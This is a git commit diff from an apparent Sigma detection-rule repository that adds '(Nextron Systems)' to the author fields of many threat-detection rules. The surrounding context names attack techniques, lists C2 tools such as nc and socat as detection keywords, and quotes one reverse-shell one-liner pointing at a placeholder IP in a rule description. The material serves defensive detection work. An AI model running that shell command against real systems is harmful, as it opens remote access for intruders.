Merge pull request #3997 from nasbench/update-nextron-authors

chore: add nextron authors tag
2023-02-01 17:07:25 +01:00
parent e7d54529d1 31a5c08480
commit ac85d5ebff
1062 changed files with 1067 additions and 1067 deletions
@@ -17,7 +17,7 @@ title: Godmode Sigma Rule
 id: def6caac-a999-4fc9-8800-cfeff700ba98
 description: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?'
 status: experimental
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/22
 modified: 2022/08/04
 level: high
@@ -5,7 +5,7 @@ related:
    - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
      type: derived
 description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 references:
    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
 date: 2019/12/22
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects Commandlet name for PrintNightmare exploitation.
 references:
    - https://github.com/calebstewart/CVE-2021-1675
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2023/01/02
 tags:
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell download command
 tags:
    - attack.execution
    - attack.t1059.001
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/04/11
 logsource:
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters
 tags:
    - attack.execution
    - attack.t1059.001
-author: Florian Roth (rule)
+author: Florian Roth (Nextron Systems)
 date: 2017/03/12
 modified: 2022/04/11
 logsource:
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters
 tags:
    - attack.execution
    - attack.t1059.001
-author: Florian Roth (rule), Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
 date: 2017/03/05
 modified: 2022/04/11
 logsource:
@@ -2,7 +2,7 @@ title: MavInject Process Injection
 id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
 status: deprecated
 description: Detects process injection using the signed Windows tool Mavinject32.exe
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 references:
    - https://twitter.com/gN3mes1s/status/941315826107510784
    - https://reaqta.com/2017/12/mavinject-microsoft-injector/
@@ -7,7 +7,7 @@ status: deprecated
 description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
 references:
    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/05/31
 modified: 2023/01/30
 tags:
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects base64 encoded listing Win32_Shadowcopy
 references:
    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2022/03/01
 modified: 2023/01/30
 tags:
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects the execution of a renamed PowerShell often used by attackers or malware
 references:
    - https://twitter.com/christophetd/status/1164506034720952320
-author: Florian Roth, frack113
+author: Florian Roth (Nextron Systems), frack113
 date: 2019/08/22
 modified: 2023/01/18
 tags:
@@ -4,7 +4,7 @@ status: depreactaed
 description: Detects the execution of a renamed PsExec often used by attackers or malware
 references:
    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/05/21
 modified: 2023/01/18
 tags:
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection
 references:
    - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/08
 modified: 2023/01/18
 logsource:
@@ -5,7 +5,7 @@ description: Detects changes to the Registry in which a monitor program gets reg
 references:
    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/26
 modified: 2022/12/19
 tags:
@@ -2,7 +2,7 @@ title: Suspicious Esentutl Use
 id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7
 status: deprecated
 description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. 
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/23
 modified: 2022/04/11
 references:
@@ -2,7 +2,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval
 id: b932b60f-fdda-4d53-8eda-a170c1d97bbd
 status: deprecated
 description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
-author: Florian Roth, Michael Haag
+author: Florian Roth (Nextron Systems), Michael Haag
 date: 2019/01/16
 modified: 2022/04/11
 references:
@@ -2,7 +2,7 @@ title: Interactive Logon to Server Systems
 id: 3ff152b2-1388-4984-9cd9-a323323fdadf
 status: test
 description: Detects interactive console logons to Server Systems
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/17
 modified: 2021/11/27
 logsource:
@@ -1,7 +1,7 @@
 title: Malicious Service Installations
 id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a
 description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
-author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
+author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
 date: 2017/03/27
 modified: 2022/03/21
 references:
@@ -7,7 +7,7 @@ references:
    - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797
    - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424
    - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
@@ -5,7 +5,7 @@ description: Detects a highly relevant Antivirus alert that reports a hack tool
 references:
    - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
    - https://www.nextron-systems.com/?s=antivirus
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2021/08/16
 modified: 2023/01/13
 tags:
@@ -6,7 +6,7 @@ references:
    - https://www.nextron-systems.com/?s=antivirus
    - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619
    - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/09/09
 modified: 2023/01/18
 tags:
@@ -9,7 +9,7 @@ references:
    - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045
    - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d
    - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2022/05/12
 modified: 2023/01/13
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
 references:
    - https://www.nextron-systems.com/?s=antivirus
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
@@ -13,7 +13,7 @@ references:
    - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
    - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
    - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects command line parameter very often used with coin miners
 references:
    - https://xmrig.com/docs/miner/command-line-options
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/09
 modified: 2022/12/25
 tags:
@@ -2,9 +2,9 @@ title: Suspicious C2 Activities
 id: f7158a64-6204-4d6d-868a-6e6378b467e0
 status: test
 description: |
-  Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
-  This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
-  These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
+    Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
+    This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
+    These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
 references:
    - 'https://github.com/Neo23x0/auditd'
 author: Marie Euler
@@ -4,7 +4,7 @@ status: test
 description: Detects relevant commands often related to malware or hacking activity
 references:
    - Internal Research - mostly derived from exploit code including code in MSF
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/12/12
 modified: 2022/10/05
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects program executions in suspicious non-program folders related to malware or hacking activity
 references:
    - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/01/23
 modified: 2021/11/27
 tags:
@@ -20,7 +20,7 @@ detection:
        exe|startswith:
            # Temporary folder
            - '/tmp/'
-            # Web server 
+            # Web server
            - '/var/www/'              # Standard
            - '/home/*/public_html/'   # Per-user
            - '/usr/local/apache2/'    # Classical Apache
@@ -2,7 +2,7 @@ title: Failed Logins with Different Accounts from Single Source - Linux
 id: fc947f8e-ea81-4b14-9a7b-13f888f94e18
 status: test
 description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/16
 modified: 2022/11/26
 tags:
@@ -4,7 +4,7 @@ status: stable
 description: Detects relevant ClamAV messages
 references:
    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/01
 tags:
    - attack.resource_development
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious session with two users present
 references:
    - https://research.checkpoint.com/2020/apache-guacamole-rce/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/03
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious shell commands used in various Equation Group scripts and tools
 references:
    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/09
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: stable
 description: Detects buffer overflow attempts in Unix system log files
 references:
    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/01
 tags:
    - attack.t1068
@@ -4,7 +4,7 @@ status: test
 description: Detects specific commands commonly used to remove or empty the syslog
 references:
    - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/09/10
 modified: 2022/11/26
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects the ld.so preload persistence file. See `man ld.so` for more information.
 references:
    - https://man7.org/linux/man-pages/man8/ld.so.8.html
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/05/05
 modified: 2022/10/09
 tags:
@@ -7,7 +7,7 @@ references:
    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
    - http://pastebin.com/FtygZ1cg
    - https://artkond.com/2017/03/23/pivoting-guide/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/21
 modified: 2021/11/27
 tags:
@@ -2,7 +2,7 @@ title: Suspicious Log Entries
 id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
 status: test
 description: Detects suspicious log entries in Linux log files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/25
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
 references:
    - https://alamot.github.io/reverse_shells/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/04/02
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects shellshock expressions in log files
 references:
    - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/14
 modified: 2022/10/09
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command sequence that JexBoss
 references:
    - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/24
 modified: 2022/07/07
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
 references:
    - https://www.qualys.com/2021/05/04/21nails/21nails.txt
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/04/05
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects exploitation attempt using public exploit code for CVE-2018-15473
 references:
    - https://github.com/Rhynorater/CVE-2018-15473-Exploit
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/24
 modified: 2021/11/27
 tags:
@@ -5,7 +5,7 @@ description: Detects suspicious SSH / SSHD error messages that indicate a fatal
 references:
    - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c
    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/06/30
 modified: 2021/11/27
 tags:
@@ -9,7 +9,7 @@ references:
    - https://www.openwall.com/lists/oss-security/2019/10/14/1
    - https://access.redhat.com/security/cve/cve-2019-14287
    - https://twitter.com/matthieugarin/status/1183970598210412546
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/15
 modified: 2022/11/26
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
 references:
    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/20
 modified: 2022/10/05
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
 references:
    - https://github.com/dagwieers/vsftpd/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/05
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
 references:
    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
 references:
    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
 references:
    - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
 references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/16
 modified: 2022/12/25
 logsource:
@@ -4,7 +4,7 @@ status: stable
 description: Detects process connections to a Monero crypto mining pool
 references:
    - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 logsource:
    product: linux
@@ -5,7 +5,7 @@ description: Detects an executable accessing an ngrok tunneling endpoint, which
 references:
    - https://twitter.com/hakluke/status/1587733971814977537/photo/1
    - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/03
 tags:
    - attack.exfiltration
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
 references:
    - https://github.com/arget13/DDexec
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/07/26
 tags:
    - attack.defense_evasion
@@ -5,7 +5,7 @@ description: Detects the presence of a base64 version of the shebang in the comm
 references:
    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
    - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.defense_evasion
@@ -6,7 +6,7 @@ references:
    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
    - https://bpftrace.org/
    - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/25
 tags:
    - attack.execution
@@ -6,7 +6,7 @@ references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
    - https://github.com/carlospolop/PEASS-ng
    - https://github.com/diego-treitos/linux-smart-enumeration
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
    - attack.discovery
@@ -4,7 +4,7 @@ status: test
 description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
 references:
    - https://github.com/sleventyeleven/linuxprivchecker/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of the 'chattr' utility to remove immutable file attribute.
 references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.defense_evasion
@@ -4,7 +4,7 @@ status: experimental
 description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
-author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
 date: 2021/10/15
 modified: 2022/09/15
 tags:
@@ -6,7 +6,7 @@ description: |
  This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
 references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.defense_evasion
@@ -4,7 +4,7 @@ status: test
 description: Detects command line parameters or strings often used by crypto miners
 references:
    - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 modified: 2022/12/25
 logsource:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
 references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.command_and_control
@@ -7,7 +7,7 @@ status: experimental
 description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
 references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/03
 tags:
    - attack.initial_access
@@ -6,7 +6,7 @@ references:
    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
    - https://github.com/apache/spark/pull/36315/files
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/20
 tags:
    - attack.initial_access
@@ -5,7 +5,7 @@ description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and pr
 references:
    - https://gtfobins.github.io/gtfobins/apt/
    - https://gtfobins.github.io/gtfobins/apt-get/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
    - attack.discovery
@@ -6,7 +6,7 @@ references:
    - https://gtfobins.github.io/gtfobins/vim/
    - https://gtfobins.github.io/gtfobins/rvim/
    - https://gtfobins.github.io/gtfobins/vimdiff/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
    - attack.discovery
@@ -7,7 +7,7 @@ references:
    - https://github.com/Gui774ume/ebpfkit
    - https://github.com/pathtofile/bad-bpf
    - https://github.com/carlospolop/PEASS-ng
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 modified: 2023/01/31
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects installation of suspicious packages using system installation utilities
 references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 tags:
    - attack.defense_evasion
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
 references:
    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.defense_evasion
@@ -6,7 +6,7 @@ references:
    - https://www.openwall.com/lists/oss-security/2019/10/14/1
    - https://access.redhat.com/security/cve/cve-2019-14287
    - https://twitter.com/matthieugarin/status/1183970598210412546
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/15
 modified: 2022/10/05
 tags:
@@ -11,7 +11,7 @@ references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
    - https://curl.se/docs/manpage.html
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.exfiltration
@@ -7,7 +7,7 @@ status: experimental
 description: Detects a suspicious curl process start on linux with set useragent options
 references:
    - https://curl.se/docs/manpage.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
    - attack.command_and_control
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of "find" binary in a suspicious manner to perform discovery
 references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
    - attack.discovery
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
 references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 modified: 2023/01/05
 tags:
@@ -5,7 +5,7 @@ description: Detects events in which a history file gets deleted, e.g. the ~/bas
 references:
    - https://github.com/sleventyeleven/linuxprivchecker/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
@@ -5,7 +5,7 @@ description: Detects events in which someone prints the contents of history file
 references:
    - https://github.com/sleventyeleven/linuxprivchecker/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious interactive bash as a parent to rather uncommon child processes
 references:
    - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/14
 logsource:
    product: linux
@@ -4,7 +4,7 @@ status: experimental
 description: Detects java process spawning suspicious children
 references:
    - https://www.tecmint.com/different-types-of-linux-shells/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/03
 tags:
    - attack.execution
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
 references:
    - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/14
 modified: 2022/07/26
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects events with patterns found in commands used for reconnaissance on linux systems
 references:
    - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 tags:
    - attack.reconnaissance
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
 references:
    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 tags:
    - attack.defense_evasion
@@ -4,7 +4,7 @@ status: experimental
 description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
 references:
    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 tags:
    - attack.defense_evasion
@@ -5,7 +5,7 @@ description: Detects suspicious sub processes of web server processes
 references:
    - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
-author: Florian Roth, Nasreddine Bencherchali (update)
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
 date: 2021/10/15
 modified: 2022/12/28
 tags:
@@ -5,7 +5,7 @@ description: Detects passwords dumps from Keychain
 references:
